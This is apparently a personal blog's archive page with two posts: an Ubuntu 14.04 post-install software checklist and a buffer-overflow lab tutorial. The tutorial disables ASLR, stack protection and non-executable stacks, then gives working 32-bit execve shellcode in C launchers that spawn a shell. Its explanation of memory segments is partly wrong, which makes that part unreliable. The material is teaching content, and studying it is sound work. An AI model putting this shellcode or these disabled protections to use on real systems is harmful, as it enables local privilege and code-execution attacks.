RSS

Monthly Archives: March 2017

After Ubuntu 14.04 Installation

I have been playing around with my system quit a lot and have crashed it several times. Few basic software installations needed after installing ubuntu 14.04. Just a reference list to set your work environment quickly. (I know it is only for very few ‘amigos’. Just a reference list for me in short..)

1) Install VLC (keep the music in background and continue with the rest \m/)

2) Install chrome

Go to official site of chrome -> Downloads -> For Personal Computers -> [Download] For Linux (Debian/Ubuntu/Fedora/openSUSE) -> [check it if you have ubuntu  distribution] 64 bit .deb (For Debian/Ubuntu) -> Accept and Install

3) Install Peda

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

4) Install libc6-dev-i38

sudo apt-get update
sudo apt-get install libc6-dev-i386

5) Install ns2, version 2.34

Follow the steps in the following link and you will be done.

http://surajpatilworld.blogspot.in/2015/02/step-by-step-installation-of-ns-234-on.html

5) Install WireShark

You can simply use the software center to install it.

6) Install ghex

sudo apt-get update
sudo apt-get install ghex

7) Install ubuntu restricted packages for many others functionality for instance, flash-plugin. Please note it might not be legal in many countries (kindly keep a check).

sudo apt-get install ubuntu-restricted-extras

8) Latex

You can again use software center to install it.

Search for “latex” in the search bar. Click on “Texmaker”. Click on “Install”.

Later you might need to install other packages according to the type of document you will be creating in Latex. Anyways google is just a click away in that case.

9) Install your favourite text editor. Let’s install sublime:

sublime-3

sudo add-apt-repository -y ppa:webupd8team/sublime-text-3
sudo apt-get update; sudo apt-get install -y sublime-text-installer

10) Install  gufw firewall. Though ubuntu does not need antivirus. It is nice to keep some firewall and protect your system from attacks.

sudo apt-get install gufw

I will add more to the list as and how needed. For now these will do.

Advertisements
 
Leave a comment

Posted by on March 21, 2017 in Uncategorized

 

Buffer overflow: Get a shell!

Initial setup

ASLR : Address Space Layout Randomization

Ubuntu and several other Linux distributions use address space randomization to randomize the starting address of heap and stack. This makes guessing the exact return address difficult; guessing addresses is one of the critical steps of a buffer overflow attack. But as our purpose is to do buffer overflow for learning we will disable this protection layer and work. We can disable address randomization using the following commands:

#sysctl -w kernel.randomize_va_space=0

To check if randomized or not, run the following command as root

# cat /proc/sys/kernel/randomize_va_space

If it says 0, that means ASLR disabled else it is not disabled.

The GCC compiler implements a security mechanism called Stack Guard to prevent buffer
overflows. In the presence of this protection, buffer overflow attacks will fail to work. You can disable this protection when you are compiling a program using the gcc option -fno-stack-

For example, to compile a program example.c with Stack Guard disabled, you can use the
following command:

# gcc -fno-stack-protector -o example example.c

Finally, Ubuntu uses NX protection to mark memory pages on the stack as non-executable.
Binaries must declare whether they require executable stacks or not as part of the ELF header. By default, gcc will mark all binaries as using non-executable stacks. To change this, add the following option to the command line in addition to the StackGuard disabling option above:

# gcc -z execstack -fno-stack-protector -o example example.c

To compile in base 32  flag “-m32 “. Flag “-g” is used for symbol tables while compiling.

# gcc -z execstack -g -m32 -fno-stack-protector -o call_shellcode call_shellcode.c

To change peda flavor to att (usually it is intel)

$nano ~/.gdbinit

after the file gets opened type:

# set att flavor in peda
set disassembly-flavor att

 

PART-A

Before you start the attack, you need a shellcode. Shellcode is the code to launch a shell. It has to be loaded into the memory so that we can force the vulnerable program to jump to it. You may use your own shell code. Consider the following program:


#include <stdio.h>
int main( ) {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}

The shellcode that we use is just the assembly version of the above program. The following
program shows you how to launch a shell by executing a shellcode stored in a buffer.
Please compile and run the following code, and see whether a shell is obtained or not.


/* call_shellcode.c
*/
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}

Compile above program

$gcc -z execstack -g -m32 -fno-stack-protector -o call_shellcode call_shellcode.c

run the above executable and you will get a shell:

$./call_shellcode

PART- B

Below is a modified version of the shell code. Compile the following program without the
additional flags as:

The program as you will see will infact give you a shell. Explain why this is so? What could be the reason why the following program didn’t require the execstack flag whereas the above one needed it?
/*A program that creates a file containing code for launching shell*/

#include <stdlib.h>
#include <stdio.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}

To compile above code:

# gcc call_shellcode-1.c -o shell -ggdb -m32

Ans:

In first problem. The code is being copied to buffer. The code section is on stack. Thus to run the code we need to make it executable, execstack is required. Whereas in second problem, the code is in data segment.

  • data segment is usually write only and thus by default it is not executable. To make write only executable one need to use flags like “mprotect”
  • whereas if the data segment is read only it becomes executable and thus flag execstack is not required.

Once you run the code you will get shell code again. Please note if you do not use -m32 it will throw an error (segmentation fault)

 

 
Leave a comment

Posted by on March 15, 2017 in Uncategorized